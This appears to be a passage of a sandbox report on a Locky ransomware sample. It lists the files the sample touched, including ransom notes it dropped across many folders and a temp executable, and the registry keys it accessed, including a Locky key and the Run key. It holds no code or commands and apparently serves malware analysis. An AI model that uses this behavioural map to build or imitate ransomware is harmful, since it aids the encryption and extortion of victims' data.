c:\Perl\perl\lib\unicore\auxiliary\SentenceBreakProperty.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\WordBreakProperty.txt<br />
c:\Perl\perl\lib\unicore\BidiMirroring.txt<br />
c:\Perl\perl\lib\unicore\Blocks.txt<br />
c:\Perl\perl\lib\unicore\CaseFolding.txt<br />
c:\Perl\perl\lib\unicore\CJKRadicals.txt<br />
c:\PHP\news.txt<br />
c:\PHP\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\CompositionExclusions.txt<br />
c:\Perl\perl\lib\unicore\DAge.txt<br />
c:\Perl\perl\lib\unicore\DCoreProperties.txt<br />
c:\Documents and Settings\User\Cookies\user@www.bing[2].txt<br />
c:\Perl\perl\lib\unicore\DNormalizationProps.txt<br />
c:\Perl\perl\lib\unicore\EastAsianWidth.txt<br />
c:\Perl\perl\lib\unicore\extracted\DBidiClass.txt<br />
c:\Perl\perl\lib\unicore\extracted\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\extracted\DBinaryProperties.txt<br />
c:\Perl\perl\lib\unicore\extracted\DCombiningClass.txt<br />
c:\Perl\perl\lib\unicore\extracted\DDecompositionType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DEastAsianWidth.txt<br />
c:\Perl\perl\lib\unicore\extracted\DGeneralCategory.txt<br />
c:\Perl\perl\lib\unicore\extracted\DJoinGroup.txt<br />
c:\Perl\perl\lib\unicore\extracted\DJoinType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DLineBreak.txt<br />
c:\Perl\perl\vendor\lib\ppm.xml<br />
c:\Perl\perl\lib\unicore\extracted\DNumType.txt<br />
c:\Perl\perl\lib\unicore\extracted\DNumValues.txt<br />
c:\Perl\perl\lib\unicore\HangulSyllableType.txt<br />
c:\Documents and Settings\User\Cookies\user@serving-sys[1].txt<br />
c:\Perl\ppm\README.txt<br />
c:\Perl\ppm\_Locky_recover_instructions.txt<br />
c:\Perl\README.txt<br />
c:\Perl\perl\lib\unicore\LineBreak.txt<br />
c:\Perl\strawberry-merge-module.reloc.txt<br />
c:\Perl\strawberry-ui.reloc.txt<br />
c:\Perl\perl\lib\unicore\Index.txt<br />
c:\PHP\install.txt<br />
c:\PHP\license.txt<br />
c:\Python27\Tools\pynche\X\xlicense.txt<br />
c:\Python27\Tools\Scripts\README.txt<br />
c:\Python27\Tools\Scripts\_Locky_recover_instructions.txt<br />
c:\PHP\readme-redist-bins.txt<br />
c:\Perl\perl\lib\unicore\NameAliases.txt<br />
c:\Perl\perl\lib\unicore\NamedSequences.txt<br />
c:\Perl\perl\lib\unicore\NamedSqProv.txt<br />
c:\Perl\perl\lib\unicore\NamesList.txt<br />
c:\Python27\Lib\email\test\data\msg_01.txt<br />
c:\Python27\Lib\email\test\data\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\email\test\data\msg_02.txt<br />
c:\Python27\Lib\email\test\data\msg_03.txt<br />
c:\Python27\Lib\email\test\data\msg_04.txt<br />
c:\Python27\Lib\email\test\data\msg_05.txt<br />
c:\Python27\Lib\email\test\data\msg_06.txt<br />
c:\Python27\Lib\email\test\data\msg_07.txt<br />
c:\Python27\Lib\email\test\data\msg_08.txt<br />
c:\Python27\Lib\email\test\data\msg_09.txt<br />
c:\Python27\Lib\email\test\data\msg_10.txt<br />
c:\Python27\Lib\email\test\data\msg_11.txt<br />
c:\Python27\Lib\email\test\data\msg_12.txt<br />
c:\Python27\Lib\email\test\data\msg_12a.txt<br />
c:\Python27\Lib\email\test\data\msg_13.txt<br />
c:\Python27\Lib\email\test\data\msg_14.txt<br />
c:\Python27\Lib\email\test\data\msg_15.txt<br />
c:\Python27\Lib\email\test\data\msg_16.txt<br />
c:\Python27\Lib\email\test\data\msg_17.txt<br />
c:\Python27\Lib\email\test\data\msg_18.txt<br />
c:\Python27\Lib\email\test\data\msg_19.txt<br />
c:\Python27\Lib\email\test\data\msg_20.txt<br />
c:\Python27\Lib\email\test\data\msg_21.txt<br />
c:\Python27\Lib\email\test\data\msg_22.txt<br />
c:\Python27\Lib\email\test\data\msg_23.txt<br />
c:\Python27\Lib\email\test\data\msg_24.txt<br />
c:\Python27\Lib\email\test\data\msg_25.txt<br />
c:\Python27\Lib\email\test\data\msg_26.txt<br />
c:\Python27\Lib\email\test\data\msg_27.txt<br />
c:\Python27\Lib\email\test\data\msg_28.txt<br />
c:\Python27\Lib\email\test\data\msg_29.txt<br />
c:\Python27\Lib\email\test\data\msg_30.txt<br />
c:\Python27\Lib\email\test\data\msg_31.txt<br />
c:\Python27\Lib\email\test\data\msg_32.txt<br />
c:\Python27\Lib\email\test\data\msg_33.txt<br />
c:\Python27\Lib\email\test\data\msg_34.txt<br />
c:\Python27\Lib\email\test\data\msg_35.txt<br />
c:\Python27\Lib\email\test\data\msg_36.txt<br />
c:\Python27\Lib\email\test\data\msg_37.txt<br />
c:\Python27\Lib\email\test\data\msg_38.txt<br />
c:\Python27\Lib\email\test\data\msg_39.txt<br />
c:\Python27\Lib\email\test\data\msg_40.txt<br />
c:\Python27\Lib\email\test\data\msg_41.txt<br />
c:\Python27\Lib\email\test\data\msg_42.txt<br />
c:\Python27\Lib\email\test\data\msg_43.txt<br />
c:\Python27\Lib\email\test\data\msg_44.txt<br />
c:\Python27\Lib\email\test\data\msg_45.txt<br />
c:\Python27\Lib\email\test\data\msg_46.txt<br />
c:\Python27\Tools\versioncheck\README.txt<br />
c:\Python27\Tools\versioncheck\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\idlelib\CREDITS.txt<br />
c:\Python27\Lib\idlelib\extend.txt<br />
c:\Python27\Lib\idlelib\help.txt<br />
c:\Python27\Lib\idlelib\HISTORY.txt<br />
c:\Python27\Tools\webchecker\README.txt<br />
c:\Python27\Tools\webchecker\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\cjkencodings\gb18030.txt<br />
c:\Python27\Lib\test\cjkencodings\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\NormalizationCorrections.txt<br />
c:\Python27\Lib\idlelib\NEWS.txt<br />
c:\Python27\Lib\idlelib\README.txt<br />
c:\Python27\Lib\idlelib\TODO.txt<br />
c:\Python27\Lib\lib2to3\Grammar.txt<br />
c:\Python27\Lib\lib2to3\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\lib2to3\PatternGrammar.txt<br />
c:\Python27\Lib\site-packages\README.txt<br />
c:\Python27\Lib\site-packages\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\PropertyAliases.txt<br />
c:\Perl\perl\lib\unicore\PropList.txt<br />
c:\Perl\perl\lib\unicore\PropValueAliases.txt<br />
c:\Perl\perl\lib\unicore\ReadMe.txt<br />
c:\Python27\Lib\test\cjkencodings\big5-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\big5.txt<br />
c:\Python27\Lib\test\cjkencodings\big5hkscs-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\big5hkscs.txt<br />
c:\Python27\Lib\test\cjkencodings\cp949-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\cp949.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jisx0213-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jisx0213.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jp-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_jp.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_kr-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\euc_kr.txt<br />
c:\Python27\Lib\test\cjkencodings\gb18030-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gb2312-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gb2312.txt<br />
c:\Python27\Lib\test\cjkencodings\gbk-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\gbk.txt<br />
c:\Python27\Lib\test\cjkencodings\hz-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\hz.txt<br />
c:\Python27\Lib\test\cjkencodings\johab-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\johab.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jis-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jis.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jisx0213-utf8.txt<br />
c:\Python27\Lib\test\cjkencodings\shift_jisx0213.txt<br />
c:\Python27\Lib\test\cmath_testcases.txt<br />
c:\Perl\perl\lib\unicore\Scripts.txt<br />
c:\Python27\Lib\test\exception_hierarchy.txt<br />
c:\Python27\Lib\test\floating_points.txt<br />
c:\Python27\Lib\test\formatfloat_testcases.txt<br />
c:\Perl\perl\lib\unicore\SpecialCasing.txt<br />
c:\Python27\Lib\test\ieee754.txt<br />
c:\Perl\perl\lib\unicore\StandardizedVariants.txt<br />
c:\Python27\Lib\test\leakers\README.txt<br />
c:\Python27\Lib\test\leakers\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\math_testcases.txt<br />
c:\Perl\perl\lib\unicore\Jamo.txt<br />
c:\Documents and Settings\User\Cookies\user@scorecardresearch[2].txt<br />
c:\Documents and Settings\User\Cookies\user@msn[2].txt<br />
c:\Documents and Settings\User\Cookies\user@msnportal.112.2o7[1].txt<br />
c:\Python27\Lib\test\test_doctest.txt<br />
c:\Python27\Lib\test\test_doctest2.txt<br />
c:\Python27\Lib\test\test_doctest3.txt<br />
c:\Python27\Lib\test\test_doctest4.txt<br />
c:\Python27\Lib\test\tokenize_tests.txt<br />
c:\Python27\Lib\test\xmltestdata\simple-ns.xml<br />
c:\Python27\Lib\test\xmltestdata\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\xmltestdata\simple.xml<br />
c:\Python27\Lib\test\xmltestdata\test.xml<br />
c:\Python27\LICENSE.txt<br />
c:\Python27\_Locky_recover_instructions.txt<br />
c:\Python27\NEWS.txt<br />
c:\Python27\README.txt<br />
c:\Perl\perl\lib\Unicode\Collate\keys.txt<br />
c:\Perl\perl\lib\Unicode\Collate\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\User\Cookies\user@microsoft[1].txt<br />
c:\Documents and Settings\User\Cookies\user@g.msn[1].txt<br />
c:\Documents and Settings\User\Cookies\user@doubleclick[1].txt<br />
c:\Documents and Settings\User\Cookies\user@c1.microsoft[2].txt<br />
c:\Documents and Settings\User\Cookies\user@c.msn[2].txt<br />
c:\Documents and Settings\User\Cookies\user@c.bing[2].txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\sqlite3.c<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmlc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtml.h<br />
c:\Perl\perl\lib\unicore\TestProp.pl<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg<br />
c:\Perl\perl\lib\Unicode\Collate\allkeys.txt<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg<br />
c:\Perl\perl\lib\unicore\UnicodeData.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\minusarm.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\no_entry.gif<br />
c:\PHP\php.gif<br />
c:\Python27\Lib\email\test\data\PyBanner048.gif<br />
c:\Python27\Lib\idlelib\Icons\folder.gif<br />
c:\Python27\Lib\idlelib\Icons\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tix8.4.3\bitmaps\plusarm.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\srcfile.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\textfile.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\warning.gif<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\tix.gif<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\idlelib\Icons\openfolder.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\openfold.gif<br />
c:\Python27\Lib\idlelib\Icons\plusnode.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\plus.gif<br />
c:\Python27\Lib\idlelib\Icons\python.gif<br />
c:\Python27\Lib\idlelib\Icons\tk.gif<br />
c:\Python27\tcl\tk8.5\demos\images\earth.gif<br />
c:\Python27\tcl\tk8.5\demos\images\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tk8.5\demos\images\earthris.gif<br />
c:\Python27\tcl\tk8.5\demos\images\tcllogo.gif<br />
c:\Python27\tcl\tk8.5\images\logo100.gif<br />
c:\Python27\tcl\tk8.5\images\_Locky_recover_instructions.txt<br />
c:\Python27\tcl\tk8.5\images\logo64.gif<br />
c:\Python27\tcl\tk8.5\images\logoLarge.gif<br />
c:\Python27\tcl\tk8.5\images\logoMed.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo100.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo150.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo175.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo200.gif<br />
c:\Python27\tcl\tk8.5\images\pwrdLogo75.gif<br />
c:\Python27\tcl\tk8.5\images\tai-ku.gif<br />
c:\Python27\Lib\idlelib\Icons\minusnode.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\act_fold.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\file.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\folder.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\info.gif<br />
c:\Python27\tcl\tix8.4.3\bitmaps\minus.gif<br />
c:\Python27\Lib\test\testtar.tar<br />
c:\Python27\Lib\test\zipdir.zip<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven&#39;s Symphony No. 9 (Scherzo).wma<br />
C:\Documents and Settings\User\Desktop\_Locky_recover_instructions.txt<br />
C:\Documents and Settings\User\Desktop\_Locky_recover_instructions.bmp<br />
C:\DOCUME~1\User\LOCALS~1\Temp\65fg67n.exe<br />
C:\WINDOWS\system32\msctfime.ime<br />
C:\WINDOWS\system32\shimgvw.dll<br />
C:\WINDOWS\system32\shimgvw.dll.123.Manifest<br />
C:\WINDOWS\system32\shimgvw.dll.123.Config<br />
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<br />
STORAGE#Volume#1&amp;30a96598&amp;0&amp;Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<br />
C:\Documents and Settings\User<br />
C:\Documents and Settings\User\Desktop<br />
C:\WINDOWS\Registration\R000000000007.clb<br />
C:\WINDOWS\Resources\themes\Luna\Shell\NormalColor\ShellStyle.dll<br />
C:\Documents and Settings\User\Desktop\*.*<br />
C:\DOCUME~1<br />
C:\DOCUME~1\User<br />
C:\DOCUME~1\User\LOCALS~1<br />
</div>
</div>
<div class="tab-pane fade" id="summary_keys">
<div class="well mono">
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System<br />
HKEY_CURRENT_USER\Software\Locky<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\SOFTWARE\Microsoft\Cryptography\Providers\Type 024<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\DESHashSessionKeyBackward<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName<br />
ActiveComputerName<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\System\Setup<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Special Paths<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014092220140929<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014092920140930<br />
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1547161642-507921405-839522115-1004<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections<br />
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\NetworkProvider\HwOrder<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\RDPNP\NetworkProvider<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\LanmanWorkstation\NetworkProvider<br />
HKEY_LOCAL_MACHINE\system\CurrentControlSet\services\WebClient\NetworkProvider<br />
HKEY_CURRENT_USER\Control Panel\Desktop<br />
HKEY_LOCAL_MACHINE\SYSTEM\Setup<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Debug\Tracing<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts<br />
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\NOTEPAD.EXE<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}<br />
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32<br />
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions<br />
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}<br />
HKEY_CLASSES_ROOT\Directory<br />
HKEY_CLASSES_ROOT\Directory\CurVer<br />
HKEY_CLASSES_ROOT\Directory\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced<br />
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\Directory\\Clsid<br />
HKEY_CLASSES_ROOT\Folder<br />
HKEY_CLASSES_ROOT\Folder\Clsid<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt<br />
HKEY_CLASSES_ROOT\.txt<br />
HKEY_CLASSES_ROOT\txtfile<br />
HKEY_CLASSES_ROOT\txtfile\CurVer<br />
HKEY_CLASSES_ROOT\txtfile\<br />
HKEY_CLASSES_ROOT\txtfile\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.txt<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\txtfile\\Clsid<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text\Clsid<br />
HKEY_CLASSES_ROOT\*<br />
HKEY_CLASSES_ROOT\*\Clsid<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\rundll32.exe<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7952-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7952-e3d2-11e0-8d7a-806d6172696f}\<br />
